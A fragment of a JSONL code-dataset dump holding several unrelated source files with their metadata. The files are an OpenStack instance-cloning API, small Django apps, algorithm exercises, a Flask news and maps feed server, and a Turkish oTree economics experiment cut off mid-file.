'key_name': instance_ref.get('key_name', ''),\n 'key_data': instance_ref.get('key_data', ''),\n 'locked': False,\n 'metadata': metadata,\n 'availability_zone': instance_ref['availability_zone'],\n 'os_type': instance_ref['os_type'],\n 'host': None,\n }\n new_instance_ref = self.db.instance_create(context, instance)\n\n # (dscannell) We need to reload the instance_ref in order for it to be associated with\n # the database session of lazy-loading.\n new_instance_ref = self.db.instance_get(context, new_instance_ref.id)\n\n elevated = context.elevated()\n if security_groups == None:\n security_groups = self.db.security_group_get_by_instance(context, instance_ref['id'])\n for security_group in security_groups:\n self.db.instance_add_security_group(elevated,\n new_instance_ref['uuid'],\n 
security_group['id'])\n\n return new_instance_ref\n\n def _instance_metadata(self, context, instance_uuid):\n \"\"\" Looks up and returns the instance metadata \"\"\"\n\n return self.db.instance_metadata_get(context, instance_uuid)\n\n def _instance_metadata_update(self, context, instance_uuid, metadata):\n \"\"\" Updates the instance metadata \"\"\"\n\n return self.db.instance_metadata_update(context, instance_uuid, metadata, True)\n\n def _next_clone_num(self, context, instance_uuid):\n \"\"\" Returns the next clone number for the instance_uuid \"\"\"\n\n metadata = self._instance_metadata(context, instance_uuid)\n clone_num = int(metadata.get('last_clone_num', -1)) + 1\n metadata['last_clone_num'] = clone_num\n self._instance_metadata_update(context, instance_uuid, metadata)\n\n LOG.debug(_(\"Instance %s has new clone num=%s\"), instance_uuid, clone_num)\n return clone_num\n\n def _is_instance_blessed(self, context, instance_uuid):\n \"\"\" Returns True if this instance is blessed, False otherwise. \"\"\"\n metadata = self._instance_metadata(context, instance_uuid)\n return 'blessed_from' in metadata\n\n def _is_instance_launched(self, context, instance_uuid):\n \"\"\" Returns True if this instance is launched, False otherwise \"\"\"\n metadata = self._instance_metadata(context, instance_uuid)\n return \"launched_from\" in metadata\n\n def _list_gridcentric_hosts(self, context):\n \"\"\" Returns a list of all the hosts known to openstack running the gridcentric service. \"\"\"\n admin_context = context.elevated()\n services = self.db.service_get_all_by_topic(admin_context, CONF.gridcentric_topic)\n hosts = []\n for srv in services:\n if srv['host'] not in hosts:\n hosts.append(srv['host'])\n return hosts\n\n def bless_instance(self, context, instance_uuid):\n # Setup the DB representation for the new VM.\n instance = self.get(context, instance_uuid)\n\n is_blessed = self._is_instance_blessed(context, instance_uuid)\n is_launched = self._is_instance_launched(context, instance_uuid)\n if is_blessed:\n # The instance is already blessed. We can't rebless it.\n raise exception.NovaException(_((\"Instance %s is already blessed. \" +\n \"Cannot rebless an instance.\") % instance_uuid))\n elif is_launched:\n # The instance is a launched one. We cannot bless launched instances.\n raise exception.NovaException(_((\"Instance %s has been launched. \" +\n \"Cannot bless a launched instance.\") % instance_uuid))\n elif instance['vm_state'] != vm_states.ACTIVE:\n # The instance is not active. We cannot bless a non-active instance.\n raise exception.NovaException(_((\"Instance %s is not active. 
\" +\n \"Cannot bless a non-active instance.\") % instance_uuid))\n\n reservations = self._acquire_addition_reservation(context, instance)\n try:\n clonenum = self._next_clone_num(context, instance_uuid)\n new_instance = self._copy_instance(context, instance_uuid,\n \"%s-%s\" % (instance['display_name'], str(clonenum)), launch=False)\n\n LOG.debug(_(\"Casting gridcentric message for bless_instance\") % locals())\n self._cast_gridcentric_message('bless_instance', context, new_instance['uuid'],\n host=instance['host'])\n self._commit_reservation(context, reservations)\n except:\n self._rollback_reservation(context, reservations)\n raise\n\n # We reload the instance because the manager may have change its state (most likely it\n # did).\n return self.get(context, new_instance['uuid'])\n\n def discard_instance(self, context, instance_uuid):\n LOG.debug(_(\"Casting gridcentric message for discard_instance\") % locals())\n\n instance = self.get(context, instance_uuid)\n if not self._is_instance_blessed(context, instance_uuid):\n # The instance is not blessed. We can't discard it.\n raise exception.NovaException(_((\"Instance %s is not blessed. \" +\n \"Cannot discard an non-blessed instance.\") % instance_uuid))\n elif len(self.list_launched_instances(context, instance_uuid)) > 0:\n # There are still launched instances based off of this one.\n raise exception.NovaException(_((\"Instance %s still has launched instances. \" +\n \"Cannot discard an instance with remaining launched ones.\") %\n instance_uuid))\n\n old, updated = self.db.instance_update_and_get_original(context, instance_uuid,\n {'task_state':task_states.DELETING})\n reservations = None\n if old['task_state'] != task_states.DELETING:\n # To avoid double counting if discard is called twice, we check if the instance\n # was already being discarded. If it was not, then we need to handle the quotas,\n # otherwise we can skip it.\n reservations = self._acquire_subtraction_reservation(context, instance)\n try:\n self._cast_gridcentric_message('discard_instance', context, instance_uuid)\n self._commit_reservation(context, reservations)\n except:\n self._rollback_reservation(context, reservations)\n raise\n\n def launch_instance(self, context, instance_uuid, params={}):\n pid = context.project_id\n uid = context.user_id\n\n instance = self.get(context, instance_uuid)\n if not(self._is_instance_blessed(context, instance_uuid)):\n # The instance is not blessed. We can't launch new instances from it.\n raise exception.NovaException(\n _((\"Instance %s is not blessed. \" +\n \"Please bless the instance before launching from it.\") % instance_uuid))\n\n # Set up security groups to be added - we are passed in names, but need ID's\n security_group_names = params.pop('security_groups', None)\n if security_group_names != None:\n security_groups = [self.db.security_group_get_by_name(context,\n context.project_id, sg) for sg in security_group_names]\n else:\n security_groups = None\n\n reservations = self._acquire_addition_reservation(context, instance)\n try:\n # Create a new launched instance.\n new_instance_ref = self._copy_instance(context, instance_uuid,\n params.get('name', \"%s-%s\" % (instance['display_name'], \"clone\")),\n launch=True, new_user_data=params.pop('user_data', None),\n security_groups=security_groups)\n\n\n LOG.debug(_(\"Casting to scheduler for %(pid)s/%(uid)s's\"\n \" instance %(instance_uuid)s\") % locals())\n\n # FIXME: The Folsom scheduler removed support for calling\n # arbitrary functions via the scheduler. Damn. 
So now we\n # have to make scheduling decisions internally. Until this\n # is sorted, we will simply cast the message and let a random\n # host pick it up. Note that this is simply a stopgap measure.\n rpc.cast(context,\n CONF.gridcentric_topic,\n {\"method\": \"launch_instance\",\n \"args\": {\"instance_uuid\": new_instance_ref['uuid'],\n \"params\": params}})\n self._commit_reservation(context, reservations)\n except:\n self._rollback_reservation(context, reservations)\n raise\n\n return self.get(context, new_instance_ref['uuid'])\n\n def _find_migration_target(self, context, instance_host, dest):\n gridcentric_hosts = self._list_gridcentric_hosts(context)\n\n if dest == None:\n # We will pick a random host.\n if instance_host in gridcentric_hosts:\n # We cannot migrate to ourselves so take that host out of the list.\n gridcentric_hosts.remove(instance_host)\n\n if len(gridcentric_hosts) == 0:\n raise exception.NovaException(_(\"There are no available hosts for the migration target.\"))\n random.shuffle(gridcentric_hosts)\n dest = gridcentric_hosts[0]\n\n elif dest not in gridcentric_hosts:\n raise exception.NovaException(_(\"Cannot migrate to host %s because it is not running the\"\n \" gridcentric service.\") % dest)\n elif dest == instance_host:\n raise exception.NovaException(_(\"Unable to migrate to the same host.\"))\n\n return dest\n\n def migrate_instance(self, context, instance_uuid, dest):\n # Grab the DB representation for the VM.\n instance_ref = self.get(context, instance_uuid)\n\n if instance_ref['task_state'] == task_states.MIGRATING:\n raise exception.NovaException(\n _(\"Unable to migrate instance %s because it is already migrating.\") %\n instance_uuid)\n elif instance_ref['vm_state'] != vm_states.ACTIVE:\n raise exception.NovaException(_(\"Unable to migrate instance %s because it is not active\") %\n instance_uuid)\n dest = self._find_migration_target(context, instance_ref['host'], dest)\n\n self.db.instance_update(context, instance_ref['uuid'], {'task_state':task_states.MIGRATING})\n LOG.debug(_(\"Casting gridcentric message for migrate_instance\") % locals())\n self._cast_gridcentric_message('migrate_instance', context,\n instance_ref['uuid'], host=instance_ref['host'],\n params={\"dest\" : dest})\n\n def list_launched_instances(self, context, instance_uuid):\n # Assert that the instance with the uuid actually exists.\n self.get(context, instance_uuid)\n filter = {\n 'metadata':{'launched_from':'%s' % instance_uuid},\n 'deleted':False\n }\n launched_instances = self.compute_api.get_all(context, filter)\n return launched_instances\n\n def list_blessed_instances(self, context, instance_uuid):\n # Assert that the instance with the uuid actually exists.\n self.get(context, instance_uuid)\n filter = {\n 'metadata':{'blessed_from':'%s' % instance_uuid},\n 'deleted':False\n }\n blessed_instances = self.compute_api.get_all(context, filter)\n return blessed_instances\n\n def check_delete(self, context, instance_uuid):\n \"\"\" Raises an error if the instance uuid is blessed. \"\"\"\n if self._is_instance_blessed(context, instance_uuid):\n raise exception.NovaException(\"Cannot delete a blessed instance. 
Please discard it instead.\")\n\n def _find_boot_host(self, context, metadata):\n\n gc_hosts = self._list_gridcentric_hosts(context)\n if metadata == None or 'gc:target_host' not in metadata:\n # Find a random host that is running the gridcentric services.\n random.shuffle(gc_hosts)\n target_host = gc_hosts[0]\n else:\n # Ensure that the target host is running the gridcentic service.\n target_host = metadata['gc:target_host']\n if target_host not in gc_hosts:\n raise exception.NovaException(\n _(\"Only able to launch on hosts running the gridcentric service.\"))\n return target_host\n\n def create(self, context, *args, **kwargs):\n \"\"\"\n This will create a new instance on a target host if one is specified in the\n gc:target-host metadata field.\n \"\"\"\n\n if not context.is_admin:\n raise exception.NovaException(_(\"This feature is restricted to only admin users.\"))\n metadata = kwargs.get('metadata', None)\n target_host = self._find_boot_host(context, metadata)\n\n # Normally the compute_api would send a message to the sceduler. In this case since\n # we have a target host, we'll just explicity send a message to that compute manager.\n compute_api = compute.API()\n def host_schedule(rpc_method,\n context, base_options,\n instance_type,\n availability_zone, injected_files,\n admin_password, image,\n num_instances,\n requested_networks,\n block_device_mapping,\n security_group,\n filter_properties):\n\n instance_uuid = base_options.get('uuid')\n now = utils.utcnow()\n self.db.instance_update(context, instance_uuid,\n {'host': target_host,\n 'scheduled_at': now})\n\n rpc.cast(context, rpc.queue_get_for(context, CONF.compute_topic, target_host),\n {\"method\": \"run_instance\",\n \"args\": {\"instance_uuid\": instance_uuid,\n \"availability_zone\": availability_zone,\n \"admin_password\": admin_password,\n \"injected_files\": injected_files,\n \"requested_networks\": requested_networks}})\n\n # Instance was already created before calling scheduler\n return self.get(context, instance_uuid)\n\n # Stub out the call to the scheduler and then delegate the rest of the work to the\n # compute api.\n compute_api._schedule_run_instance = host_schedule\n return compute_api.create(context, *args, **kwargs)\n","sub_path":"nova/gridcentric/nova/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":20351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"619625383","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'login'\nurlpatterns = [\n path('', views.send_to_websites, name='home'),\n path('login/', views.do_login, name='login'),\n path('logout/', views.do_logout, name='logout'),\n]\n","sub_path":"login/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"209303698","text":"# https://oj.leetcode.com/problems/search-in-rotated-sorted-array/\n\nclass Solution:\n # @param A, a list of integers\n # @param target, an integer to be searched\n # @return an integer\n # loop invariant: before the ith iteration, A[left..right] is rotated sorted array\n # initialization: A[0..n-1] is rotated sorted array.\n # maintenance:\n # 1. 
if target is found, return mid\n def search(self, A, target):\n n = len(A)\n left, right = 0, n - 1\n while left <= right:\n mid = left + (right - left) / 2\n if A[mid] == target:\n return mid\n elif A[left] <= A[mid]:\n if A[left] <= target and target < A[mid]:\n right = mid - 1\n else:\n left = mid + 1\n else:\n if A[mid] < target and target <= A[right]:\n left = mid + 1\n else:\n right = mid - 1\n return -1\n","sub_path":"leetans/searchRotatedArray.py","file_name":"searchRotatedArray.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"52599901","text":"# from ExtendedEuklidianAlgorithm import *\n# from SquareAndMultiply import *\n# from ChineseRemainderTheorem import *\n\n\ndef allPerms(values):\n \"\"\"\n A generator that yields all permutations of the values in values. \n\n Params:\n valus: Must be an iterable object. All permutations of its content are yielded (Iterable)\n\n Yields:\n The next permutation of the values in values\n \n Raises:\n ValueError: Should values not be iterable\n \"\"\"\n try:\n values = iter(values)\n except:\n raise ValueError(\"Parameter values must be Iterable\")\n\n values = list(values)\n\n\n def innerAllPerms(setvalues,values):\n \"\"\"\n Inner function that yields all permutations of the given values recursively.\n\n One recursive call sets one more value of the current permutation and calls itself recursively \n to permutate over the rest. If only one value is left to permutate over the permutation is yielded and \n other values are set by the calling function.\n \"\"\"\n if len(values)==1:\n ret = setvalues[:]\n ret.append(values[0])\n yield ret\n elif len(values)==0:\n # only happens if the initial values were an empty iterator\n yield []\n else:\n # take from the front and append back at the end\n # this way we can circumvent iteration while working on the list\n unsetvalues = len(values)\n for i in range(unsetvalues):\n setvalues.append(values.pop(0))\n yield from innerAllPerms(setvalues,values)\n values.append(setvalues.pop(len(setvalues)-1))\n\n yield from innerAllPerms([],values)","sub_path":"Python/discreteMath/DiscreteMathTools.py","file_name":"DiscreteMathTools.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"34351340","text":"import math\nimport string\ndigs = string.digits + string.letters\n\ndef int2base(x, base):\n if x < 0: sign = -1\n elif x == 0: return digs[0]\n else: sign = 1\n x *= sign\n digits = []\n while x:\n digits.append(digs[x % base])\n x /= base\n if sign < 0:\n digits.append('-')\n digits.reverse()\n return ''.join(digits)\n\ndef liste_primes_erastothene(n):\n visited = [False for _ in range(n + 1)]\n visited[0] = visited[1] = True\n for i in range(2, n + 1):\n if visited[i]:\n continue\n for j in range(i*i, n + 1, i):\n visited[j] = True\n return [i for i in range(2, n + 1) if not visited[i]]\n\nlp = liste_primes_erastothene(10000000)\nllp = len(lp)\n\ndef get_divisor(p):\n r=math.sqrt(p)\n n = 0\n while n < llp and lp[n]<=r:\n if p%lp[n]==0:\n return lp[n]\n n+=1\n return False\n\ndef get_cases(filename):\n with open(filename, 'r') as f:\n T = int(f.readline())\n N, J = [int(x) for x in f.readline().split()]\n return N, J\n\ndef find_jamcoin(N, J):\n b = '1' + ''.join(['0' for _ in range(N-2)]) + '1'\n d = int(b, 2)\n count = 0\n res = []\n while count < J:\n divisors = is_jamcoin(b)\n if divisors:\n count += 1\n 
res.append((b, divisors))\n d += 2\n b = int2base(d, 2)\n return res\n\ndef is_jamcoin(b):\n divisors = []\n for base in range(2,11):\n divisor = get_divisor(int(b, base))\n if not(divisor):\n return False\n else :\n divisors.append(divisor)\n return divisors\n\ndef b_print(res, T, filename):\n with open(filename, 'w') as f:\n line = \"Case #1:\"\n print(line)\n f.write(line + \"\\n\")\n for t in range(T):\n line = \"{0} {1}\".format(res[t][0], ' '.join([str(x) for x in res[t][1]]))\n print(line)\n f.write(line + \"\\n\")\n\nif __name__ == '__main__':\n filename = 'testp3.txt'\n N, J = get_cases(filename)\n res = find_jamcoin(N, J)\n b_print(res, J, 'outputp3.txt')","sub_path":"codes/CodeJamCrawler/16_0_3_neat/16_0_3_floriangagnadre_p3.py","file_name":"16_0_3_floriangagnadre_p3.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"442097396","text":"import os\r\n\r\ndef delete_files():\r\n\tos.chdir(os.getcwd()+\"\\pics\")\r\n\tteams = os.listdir(os.getcwd())\r\n\tfor element in teams: #for each folder in the pics folder\r\n\t\tcurrent_dir = os.getcwd()+\"\\\\\"+element\r\n\t\tfiles = os.listdir(current_dir)\r\n\t\tfor f in files: #for each file in teams folder\r\n\t\t\tos.remove(current_dir+\"\\\\\\\\\"+f) #delete file\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tdelete_files()","sub_path":"delete_files.py","file_name":"delete_files.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"137221669","text":"from django.db import models\nfrom .utils import getLinkData\n\n# Create your models here.\nclass Link(models.Model):\n title = models.CharField(max_length=220, blank=True)\n url = models.URLField()\n current_price = models.FloatField(blank=True)\n old_price = models.FloatField(default=0)\n price_difference = models.FloatField(default=0)\n updated = models.DateTimeField(auto_now=True)\n created = models.DateTimeField(auto_now=True)\n \n def __str__(self):\n return self.title\n\n class Meta:\n ordering = ('price_difference', '-created')\n\n def save(self, *args, **kwargs):\n title, price = getLinkData(self.url)\n old_price = self.current_price\n if self.current_price:\n if price != old_price:\n diff = price - old_price\n self.price_difference = round(diff, 2)\n self.old_price = old_price\n \n\n else:\n self.old_price = 0\n self.price_difference = 0\n\n self.title = title\n self.current_price = price\n\n super().save(*args, **kwargs)","sub_path":"links/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"291298171","text":"import os\nimport sys\nimport json\nimport shelve\nimport traceback\nimport BrainiacConfig\n\nfrom flask import Flask\nfrom flask import request\nfrom flask import Response\nfrom flask import jsonify\nfrom flask import render_template\n\nfrom NinjaUtil import LoggingDaemon\nfrom BrainiacUtil import BrainiacApi\n\nfrom FeedHandlers import feed_twitter\nfrom FeedHandlers import feed_bbcnews\nfrom FeedHandlers import feed_googlemaps\n\ntfolder = os.path.join (os.path.dirname (os.path.abspath (__file__)), 'templates')\nsfolder = os.path.join (os.path.dirname (os.path.abspath (__file__)), 'static')\napp = Flask ('brainiac', template_folder=tfolder, static_folder=sfolder)\n\n@app.route (\"/\")\ndef index ():\n return render_template
('index.html')\n\n@app.route (\"/dashboard\")\ndef dashboard ():\n return render_template ('dashboard.html')\n\n@app.route (\"/javascript/\")\ndef staticJavaScript (path):\n return app.send_static_file (path)\n\n@app.route (BrainiacConfig.prefix + \"/amenities\", methods=[\"GET\"])\n@BrainiacApi\ndef getAmenityTypesListing ():\n ret = { 'data' : [] }\n for i in feed_googlemaps.Amenities:\n ret ['data'].append ({'type':i})\n return jsonify (ret)\n\n@app.route (BrainiacConfig.prefix + \"/lookup\", methods=[\"GET\"])\n@BrainiacApi (wants = [('GET', 'json')])\ndef getAreaAmenityNodes ():\n query = request.json ['location']\n qtype = request.json ['amenity']\n qradius = request.json ['radius']\n apikey = BrainiacConfig.GoogleMaps ['apikey']\n resource = BrainiacConfig.GoogleMaps ['resource']\n data = feed_googlemaps.GoogleMaps_feed_hook (resource, 'GoogleMaps', query, {},\n apikey=apikey, radius=qradius,\n amenityType=qtype,\n proxy=BrainiacConfig.Proxy)\n if data [0] is True:\n return jsonify (json.loads (data [1]))\n\n@app.route (BrainiacConfig.prefix + \"/bbcnews\", methods=[\"GET\", \"POST\"])\n@BrainiacApi (wants = [('POST','json')])\ndef bbcNewsFeed ():\n if request.method == 'GET':\n links = []\n for i in BrainiacConfig.BBCFeeds ['elements']:\n key = i.keys () [0]\n links.append ({'feed' : key})\n return jsonify ({'feeds' : links})\n elif request.method == 'POST':\n location = request.json ['location']\n found = (False, None)\n for i in BrainConfig.BBCFeeds ['elements']:\n if location in i:\n found = (True, i [location])\n if found [0] is False:\n resp = jsonify ({'error':'Invalid location %s' % location})\n resp.status_code = 400\n return resp\n else:\n LoggingDaemon.info (\"Looking up feed [%s]\" % found [1])\n db = shelve.open (BrainConfig.shelf)\n data = feed_bbcnews.BBCNews_feed_hook (found [1], key='BBCNews',\n location=location, shelve=db,\n proxy=BrainConfig.Proxy)\n db.close ()\n if data [0] is True:\n return jsonify (json.loads (data [1]))\n else:\n resp = jsonify ({'error':\"feed failed %s\" % str (sys.exc_info ())})\n resp.status_code = 400\n return resp\n\n@app.route (BrainiacConfig.prefix + \"/tweets\", methods=[\"GET\"])\n@BrainiacApi (wants = [('GET','json')])\ndef getTweetListing ():\n location = request.json ['location']\n query = request.json ['query']\n radius = request.json ['radius']\n data = feed_twitter.Twitter_feed_hook (BrainiacConfig.Twitter ['resource'],\n 'Twitter', location, {}, radius = radius, query=query,\n consumer_key = BrainiacConfig.Twitter ['consumer_key'],\n consumer_secret = BrainiacConfig.Twitter ['consumer_secret'],\n access_token = BrainiacConfig.Twitter ['access_token'],\n access_secret = BrainiacConfig.Twitter ['access_token_secret'],\n proxy=BrainiacConfig.Proxy)\n if data [0] is True:\n return jsonify (json.loads (data [1]))\n\nclass BrainiacsRestLayer:\n def __init__ (self, bind='localhost', port=8080, debug=False):\n self.bind = bind\n self.port = port\n self.debug = debug\n\n def execute (self):\n global app\n app.run (host=self.bind, port=self.port, debug=self.debug)\n","sub_path":"Brainiac/BrainiacServer.py","file_name":"BrainiacServer.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"55081457","text":"import random\n\nfrom otree.api import *\n\n\ndoc = \"\"\"\nThis is a Pension Game first introduced by Hammond(1975). 
\nThe Pension Game is a version of the standard investment game in which the amount sent by player 1 is tripled.\nIt was first proposed by\n\n Berg, Dickhaut, and McCabe (1995)\n.\n\"\"\"\n\n\nclass Constants(BaseConstants):\n name_in_url = 'TPEGcont'\n players_per_group = 8\n num_rounds = 10\n instructions_template = 'TPEGcont/instructions.html'\n table_template = 'TPEGcont/table.html'\n # Initial amount allocated to players+\n endowment_Decider = 9\n endowment_Receiver = 1\n multiplier = 1\n\n\nclass Subsession(BaseSubsession):\n pass\n\n\nclass Group(BaseGroup):\n sent_2 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount sent by P2\"\"\",\n )\n expect_2 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount expected by P2\"\"\",\n )\n sent_3 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount sent by P3\"\"\",\n )\n expect_3 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount expected by P3\"\"\",\n )\n sent_4 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount sent by P4\"\"\",\n )\n expect_4 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount expected by P4\"\"\",\n )\n sent_5 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount sent by P5\"\"\",\n )\n expect_5 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount expected by P5\"\"\",\n )\n sent_6 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount sent by P6\"\"\",\n )\n expect_6 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount expected by P6\"\"\",\n )\n sent_7 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount sent by P7\"\"\",\n )\n expect_7 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount expected by P7\"\"\",\n )\n sent_8 = models.CurrencyField(\n min=0,\n max=Constants.endowment_Decider - 2,\n doc=\"\"\"Amount sent by P8\"\"\",\n )\n\n\nclass Player(BasePlayer):\n rol = models.StringField(initial='')\n overall_payoff = models.CurrencyField(initial=0)\n gpa = models.StringField(\n choices=[\n '0,00 - 0,50',\n '0,50 - 1,00',\n '1,00 - 1,50',\n '1,50 - 2,00',\n '2,00 - 2,50',\n '2,50 - 3,00',\n '3,00 - 3,50',\n '3,50 - 4,00',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Akademik Not Ortalamanız\",\n )\n accept = models.StringField(\n choices=['Kabul ediyorum.', 'Kabul etmiyorum'],\n widget=widgets.RadioSelectHorizontal,\n label=\"Gönüllü olarak katıldığım bu deneyde tarafımdan herhangi bir kişisel bilgi istenilmemiştir.\",\n )\n dep = models.StringField(\n choices=[\n 'STEM (Bilim, Teknoloji, Mühendislik ve Matematik)',\n 'HASS (Beşeri, Sanat ve Sosyal Bilimler)',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Alan\",\n )\n age = models.StringField(\n choices=['≤24', '25-29', '30-39', '40-54', '≥55'],\n widget=widgets.RadioSelectHorizontal,\n label=\"Yaş\",\n )\n gen = models.StringField(\n choices=['Kadın', 'Erkek'], widget=widgets.RadioSelectHorizontal, label=\"Cinsiyet\"\n )\n edu = models.StringField(\n choices=['Lisans', 'Yüksek Lisans', 'Doktora'],\n widget=widgets.RadioSelectHorizontal,\n label=\"Eğitim\",\n )\n inc = models.StringField(\n choices=['500-1000', '1000-2000', '2000-3000', '3000-4000', '4000-5000', '5000+'],\n 
widget=widgets.RadioSelectHorizontal,\n label=\"Aylık Ortalama Gelir\",\n )\n h_inc = models.StringField(\n choices=['500-1000', '1000-2000', '2000-3000', '3000-4000', '4000-5000', '5000+'],\n widget=widgets.RadioSelectHorizontal,\n label=\"Aylık Ortalama Hanehalkı Geliri\",\n )\n env_cons_2 = models.StringField(\n choices=[\n 'Kesinlikle katılmıyorum',\n 'Biraz katılmıyorum',\n 'Ne katılıyorum, ne de katılmıyorum',\n 'Biraz katılıyorum',\n 'Kesinlikle katılıyorum',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Kaynaklarımızın daha uzun süre dayanması için herkes ürün tüketimini artırmayı bırakmalıdır.\",\n )\n env_cons_3 = models.StringField(\n choices=[\n 'Kesinlikle katılmıyorum',\n 'Biraz katılmıyorum',\n 'Ne katılıyorum, ne de katılmıyorum',\n 'Biraz katılıyorum',\n 'Kesinlikle katılıyorum',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Bu ülke konut geliştirme konusunda(tarım arazileri üzerinde yeni alışveriş merkezi inşaatı, yeni alt bölümler vb.) daha fazla kısıtlamaya ihtiyaç duymaktadır.\",\n )\n env_cons_5 = models.StringField(\n choices=[\n 'Kesinlikle katılmıyorum',\n 'Biraz katılmıyorum',\n 'Ne katılıyorum, ne de katılmıyorum',\n 'Biraz katılıyorum',\n 'Kesinlikle katılıyorum',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Aşırı kirlilik üreten şirketlere yönelik tüketici boykot programlarına başladım/katıldım.\",\n )\n env_cons_6 = models.StringField(\n choices=[\n 'Kesinlikle katılmıyorum',\n 'Biraz katılmıyorum',\n 'Ne katılıyorum, ne de katılmıyorum',\n 'Biraz katılıyorum',\n 'Kesinlikle katılıyorum',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Kimse bakmazsa çöp dökerim.\",\n )\n env_cons_7 = models.StringField(\n choices=[\n 'Kesinlikle katılmıyorum',\n 'Biraz katılmıyorum',\n 'Ne katılıyorum, ne de katılmıyorum',\n 'Biraz katılıyorum',\n 'Kesinlikle katılıyorum',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Bugün çevresel faaliyetlere katılımım, gelecek nesiller için çevrenin korunmasına yardımcı olacaktır.\",\n )\n env_cons_9 = models.StringField(\n choices=[\n 'Kesinlikle katılmıyorum',\n 'Biraz katılmıyorum',\n 'Ne katılıyorum, ne de katılmıyorum',\n 'Biraz katılıyorum',\n 'Kesinlikle katılıyorum',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Kirliliğin bitki ve hayvan yaşamına yol açtığı zararı düşündüğümde kızıyorum.\",\n )\n investment_options_1 = models.StringField(\n choices=[\n '%10 olasılıkla 8₺ ve %90 olasılıkla 6,4₺',\n '%10 olasılıkla 15,4₺ ve %90 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_2 = models.StringField(\n choices=[\n '%20 olasılıkla 8₺ ve %80 olasılıkla 6,4₺',\n '%20 olasılıkla 15,4₺ ve %80 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_3 = models.StringField(\n choices=[\n '%30 olasılıkla 8₺ ve %70 olasılıkla 6,4₺',\n '%30 olasılıkla 15,4₺ ve %70 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_4 = models.StringField(\n choices=[\n '%40 olasılıkla 8₺ ve %60 olasılıkla 6,4₺',\n '%40 olasılıkla 15,4₺ ve %60 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_5 = models.StringField(\n choices=[\n '%50 olasılıkla 8₺ ve %50 olasılıkla 6,4₺',\n '%50 olasılıkla 15,4₺ ve %50 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_6 = models.StringField(\n choices=[\n '%60 olasılıkla 8₺ ve %40 olasılıkla 6,4₺',\n '%60 olasılıkla 15,4₺ 
ve %40 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_7 = models.StringField(\n choices=[\n '%70 olasılıkla 8₺ ve %30 olasılıkla 6,4₺',\n '%70 olasılıkla 15,4₺ ve %30 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_8 = models.StringField(\n choices=[\n '%80 olasılıkla 8₺ ve %20 olasılıkla 6,4₺',\n '%80 olasılıkla 15,4₺ ve %20 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_9 = models.StringField(\n choices=[\n '%90 olasılıkla 8₺ ve %10 olasılıkla 6,4₺',\n '%90 olasılıkla 15,4₺ ve %10 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n investment_options_10 = models.StringField(\n choices=[\n '%100 olasılıkla 8₺ ve %0 olasılıkla 6,4₺',\n '%100 olasılıkla 15,4₺ ve %0 olasılıkla 0,4₺',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\" \",\n )\n fate = models.StringField(\n choices=[\n 'Kesinlikle 